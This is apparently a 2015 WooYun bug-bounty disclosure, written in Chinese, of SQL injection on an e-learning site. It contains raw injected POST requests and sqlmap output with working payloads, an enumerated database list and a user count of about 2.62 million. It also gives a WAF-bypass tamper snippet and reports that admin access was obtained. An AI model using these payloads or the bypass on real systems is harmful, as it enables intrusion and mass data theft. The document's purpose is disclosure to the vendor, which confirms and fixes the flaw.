乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-22: 细节已通知厂商并且等待厂商处理中 2015-01-23: 厂商已经确认,细节仅向厂商公开 2015-02-02: 细节向核心白帽子及相关领域专家公开 2015-02-12: 细节向普通白帽子公开 2015-02-22: 细节向实习白帽子公开 2015-03-08: 细节向公众公开
233
http://elearning.100e.com/lvword/AddToMyLib.asp?LetterLevel=0&PageNo=6&WordLevel=
2处post型POST /lvword/ApplyAdd.asp HTTP/1.1Content-Length: 182Content-Type: application/x-www-form-urlencodedReferer: http://elearning.100e.com/Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCGHost: elearning.100e.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Slct_WordID=%5c&Slct_WordID=1038&Slct_WordID=1923&Slct_WordID=1739&Slct_WordID=1738&Slct_WordID=1690&Slct_WordID=2043&Slct_WordID=1679&Slct_WordID=1619&Slct_WordID=999&User=100eGuest-------------POST /lvWord/ApplyDel.asp HTTP/1.1Content-Length: 25Content-Type: application/x-www-form-urlencodedReferer: http://elearning.100e.com/Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCGHost: elearning.100e.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Delete=%5c&user=100eGuest
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: WordLevel Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: LetterLevel=0&PageNo=6&WordLevel=-9134' OR (1585=1585)# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: LetterLevel=0&PageNo=6&WordLevel=' AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x7165746571,(SELECT (CASE WHEN (4947=4947) THEN 1 ELSE 0 END)),0x71787a6d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeHm'='ZeHm Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: LetterLevel=0&PageNo=6&WordLevel=' UNION ALL SELECT NULL,CONCAT(0x7165746571,0x41765065585877547578,0x71787a6d71),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: LetterLevel=0&PageNo=6&WordLevel=' AND 7649=BENCHMARK(5000000,MD5(0x77536462)) AND 'dqTB'='dqTB---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: MySQL 5.0available databases [26]:[*] 100eDB[*] 100eDB2[*] 100eZone[*] Admin[*] AppendDB[*] Book[*] Chat7[*] Chat7_Log[*] Client[*] ClientLog[*] Course[*] Edu[*] FileService[*] Group[*] information_schema[*] IPLocation[*] mysql[*] School[*] Tag[*] TEC[*] TemporaryDB[*] test[*] User[*] VC2008[*] VC6[*] VC7----------------泄露的信息有,用户,加盟用户,还有第三方信息。看下mymenber:select count(*) from mymember: '262 6446' 262万用户数据dump其他表查看的时候正常,就是dump mymenber这个表的时候就被禁止连接了,明显是做了入库前检查,但是。。。。payload= "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)成功绕过。。。。拿到管理后,发现管理的权限都不尽相同。贴一个图:
1,建议检查全站,问题比较多。2,求20rank!!!
危害等级:高
漏洞Rank:15
确认时间:2015-01-23 10:07
谢谢,马上修复。
2015-01-23:已经修复